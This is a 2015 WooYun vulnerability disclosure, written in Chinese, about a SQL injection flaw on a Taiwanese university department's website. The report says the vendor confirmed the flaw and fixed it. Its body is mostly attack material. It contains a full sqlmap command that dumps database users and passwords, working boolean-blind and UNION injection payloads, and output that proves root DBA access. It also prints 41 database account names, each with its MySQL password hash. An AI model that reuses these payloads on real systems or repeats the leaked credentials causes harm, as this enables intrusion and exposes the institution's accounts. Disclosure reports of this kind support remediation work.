当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146585

漏洞标题:台湾国立交通大学电子工程系某处存在SQL注射漏洞(DBA权限/管理账号密码泄露/大量用户操作信息泄露)(臺灣地區)

相关厂商:台湾国立交通大学

漏洞作者: 路人甲

提交时间:2015-10-14 10:20

修复时间:2015-11-27 12:12

公开时间:2015-11-27 12:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商已经确认,细节仅向厂商公开
2015-10-25: 细节向核心白帽子及相关领域专家公开
2015-11-04: 细节向普通白帽子公开
2015-11-14: 细节向实习白帽子公开
2015-11-27: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

台湾国立交通大学电子工程系某处存在SQL注射漏洞(DBA权限/管理账号密码泄露/大量用户操作信息泄露)

详细说明:

国立交通大学工程学系:http://**.**.**.**/
使用sqlmap进行测试,地址:http://**.**.**.**/People/Professor/individual.php?TeacherID=T9434

python sqlmap.py -u "http://**.**.**.**/People/Professor/individual.php?TeacherID=T9434" -p TeacherID --random-agent --technique=BU --current-user --is-dba --users --passwords


漏洞证明:

1. DBA权限

---
Parameter: TeacherID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TeacherID=T9434' AND 4098=4098 AND 'EvrF'='EvrF
Type: UNION query
Title: Generic UNION query (NULL) - 37 columns
Payload: TeacherID=-8154' UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x52635944654f696f5666,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current user is DBA: True


2. 管理账号密码泄露

back-end DBMS: MySQL 5
database management system users [41]:
[*] '240mail'@'**.**.**.**'
[*] 'a10485a'@'localhost'
[*] 'acppiod'@'localhost'
[*] 'backup'@'localhost'
[*] 'backupuser'@'**.**.**.**'
[*] 'badge_vote'@'localhost'
[*] 'book'@'localhost'
[*] 'cactiuser'@'localhost'
[*] 'disscuss'@'localhost'
[*] 'eej'@'localhost'
[*] 'EEunion'@'localhost'
[*] 'eeweb'@'localhost'
[*] 'forum'@'localhost'
[*] 'hsy'@'localhost'
[*] 'MAdmin'@'localhost'
[*] 'mapply'@'localhost'
[*] 'mark'@'localhost'
[*] 'michael'@'**.**.**.**'
[*] 'michael'@'localhost'
[*] 'milk'@'localhost'
[*] 'mysqlcopy'@'%'
[*] 'mysqlcopy'@'%.**.**.**.**'
[*] 'news'@'**.**.**.**'
[*] 'news'@'localhost'
[*] 'news_reader'@'localhost'
[*] 'newweb'@'localhost'
[*] 'paper'@'**.**.**.**'
[*] 'paper'@'localhost'
[*] 'pplsel'@'localhost'
[*] 'pureftpd'@'localhost'
[*] 'pureftpd'@'student.**.**.**.**'
[*] 'questionnaire'@'localhost'
[*] 'repl'@'%.**.**.**.**'
[*] 'root'@'localhost'
[*] 'tvbull'@'**.**.**.**'
[*] 'unya'@'localhost'
[*] 'wordpress'@'localhost'
[*] 'wp'@'localhost'
[*] 'wp_stunion'@'localhost'
[*] 'wpalumni'@'localhost'
[*] 'wwwadm'@'localhost'
database management system users password hashes:
[*] 240mail [1]:
password hash: *7DCE9677F3ED3BB5ACDE89F2CDDCF97076D6143C
[*] a10485a [1]:
password hash: *2C313D48338CCB28ECE45F6C995892D113E00DC1
[*] acppiod [1]:
password hash: *7C128C300EF18BFA6445F8EA7788D2D16495D555
[*] backup [1]:
password hash: *691CD38B08B0171337E4B62E65A61747CEEC5E83
[*] backupuser [1]:
password hash: *DE57A4659C18676FB38430A332E0941C46F96BD0
[*] badge_vote [1]:
password hash: *88CCD2620454FD120F735703376955D455564455
[*] book [1]:
password hash: *C693AED378DDC4ADD6E57E7EB0C8F953CAB9EDF0
[*] cactiuser [1]:
password hash: *6804FAAB1D6A0209FF48723F44BDAC274BF41778
[*] disscuss [1]:
password hash: *A6D085D106FCBBECE593AD9059F850284AB1D630
[*] eej [1]:
password hash: *CD8A0F6515A2F6B52FB1E5E1793A99F3F6AC20C7
[*] EEunion [1]:
password hash: *43E64D7725ED0C04A3FFC306511988AC29897F3F
[*] eeweb [1]:
password hash: *298B3D2CB3B20CAB5A8041877F7AB1C4EEE1DC62
[*] forum [1]:
password hash: *1A7BE45D04BDF4EA70F89B8FA273057F15C3343B
[*] hsy [1]:
password hash: *228402949029DF391508B2BD5FF4DFD24BE4258B
[*] MAdmin [1]:
password hash: *EDABA8DB01BB036FC23113EDCBDFA5006B01D809
[*] mapply [1]:
password hash: *0C3B0B31E0E7FB9E9E26BCFA9FA4FF22666947D6
[*] mark [1]:
password hash: *C5C3977D20DEEE866F8D762FEBECCD5DEA9E394A
[*] michael [1]:
password hash: *49207F612DEE5656C4053587C900847949401A3D
[*] milk [1]:
password hash: *145A2525AE5D66744EFF09FB409467D275C99A50
[*] mysqlcopy [1]:
password hash: *07FBFE7F154B2A70CF027602FAF1185DFEF818B2
[*] news [1]:
password hash: *57F680D5D86C384FD5C35594F2E11C71C3886041
[*] news_reader [1]:
password hash: *48C9198869FFF6DB0B187C765E8CCED08F76393B
[*] newweb [1]:
password hash: *1AC65C6B7391D15C45F1C17D28E82732C30126C4
[*] paper [1]:
password hash: *E3758CE4B8D58D445F0DD0B5450C591813374A03
[*] pplsel [1]:
password hash: *6E104DC0ED621288023AE9F17B3D0DF96E008B18
[*] pureftpd [1]:
password hash: *16D870632F39545F804BFB02A89CE1AE2F8B6D8B
[*] questionnaire [1]:
password hash: *E54C4F8B20904F5F87FEDB5E336396A838E9CAF8
[*] repl [1]:
password hash: *7AB999A4E0B04D577F496C4E372F0A0692154A27
[*] root [1]:
password hash: *D9C3AE6C87C278CA8EAD833E59E4CABA05D7F27A
[*] tvbull [1]:
password hash: *680FB9B5E50660D6685A6695389A6E026F5FA605
[*] unya [1]:
password hash: *F69CD259E7A4098CD2FB7FB92C2C67B93449BBE3
[*] wordpress [1]:
password hash: *8F1E8A8194D2A6EA3F45D3445F4BD715AECA6F63
[*] wp [1]:
password hash: *EBE66399130FDBD51D94605A736965DA1DD7AE00
[*] wp_stunion [1]:
password hash: *5FC926673FECAE93E5BC4B47E0112D1FB4453053
[*] wpalumni [1]:
password hash: *1E9D0571DF9E23E352DBD0406DA25667814DB7A2
[*] wwwadm [1]:
password hash: *AFD5DA969B18E7D281DB2B39EC01D3FA5A653081


3. 用户操作信息泄露

Database: Log
Table: 2013
[5855 entries]


1.gif

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-10-15 05:54

厂商回复:

感謝通報

最新状态:

2015-11-27:已修正